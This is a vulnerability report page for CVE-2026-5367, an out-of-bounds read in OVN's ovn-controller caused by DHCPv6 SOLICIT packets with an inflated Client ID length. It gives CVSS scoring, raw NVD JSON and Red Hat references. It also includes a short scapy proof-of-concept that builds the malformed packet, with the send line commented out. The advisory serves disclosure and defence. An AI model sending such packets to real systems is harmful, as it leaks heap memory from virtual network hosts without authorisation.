Security Vulnerability Report
CVE-2026-5367 CVSS 8.6 HIGH

Published: 2026-04-24 13:16:22
Last Modified: 2026-04-29 18:16:05

Description

A flaw was found in OVN (Open Virtual Network). A remote attacker, by sending crafted DHCPv6 (Dynamic Host Configuration Protocol for IPv6) SOLICIT packets with an inflated Client ID length, could cause the ovn-controller to read beyond the bounds of a packet. This out-of-bounds read can lead to the disclosure of sensitive information stored in heap memory, which is then returned to the attacker's virtual machine port.

CVSS Details

CVSS Score: 8.6
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

For the specific affected versions, refer to Red Hat security advisory RHSA-2026:11694 and subsequent related advisories.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Only the names this script uses; scapy.all re-exports each of them
from scapy.all import DHCP6_Solicit, DHCP6OptClientId, Ether, IPv6, UDP, sendp

# Target configuration
target_mac = "00:11:22:33:44:55"
src_mac = "aa:bb:cc:dd:ee:ff"

# Construct malicious DHCPv6 Solicit packet
# The vulnerability is triggered by an inflated Client ID length
malicious_client_id = DHCP6OptClientId(optlen=0xFFFF)

# Assemble the packet; DHCPv6 options are stacked as layers after the Solicit header
pkt = (
    Ether(src=src_mac, dst=target_mac)
    / IPv6(src="::", dst="ff02::1:2")
    / UDP(sport=546, dport=547)
    / DHCP6_Solicit(trid=12345)
    / malicious_client_id
)

# Send packet to trigger the out-of-bounds read
# sendp(pkt, iface="eth0")
print("[+] Malicious DHCPv6 packet generated for CVE-2026-5367")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-5367", "sourceIdentifier": "[email protected]", "published": "2026-04-24T13:16:21.990", "lastModified": "2026-04-29T18:16:04.980", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in OVN (Open Virtual Network). A remote attacker, by sending crafted DHCPv6 (Dynamic Host Configuration Protocol for IPv6) SOLICIT packets with an inflated Client ID length, could cause the ovn-controller to read beyond the bounds of a packet. This out-of-bounds read can lead to the disclosure of sensitive information stored in heap memory, which is then returned to the attacker's virtual machine port."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-130"}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:11694", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:11695", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:11696", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:11698", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:11700", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:11701", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:11702", "source": "[email protected]"}, {"url": 
"https://access.redhat.com/security/cve/CVE-2026-5367", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2455863", "source": "[email protected]"}, {"url": "http://www.openwall.com/lists/oss-security/2026/04/20/3", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "http://www.openwall.com/lists/oss-security/2026/04/20/5", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}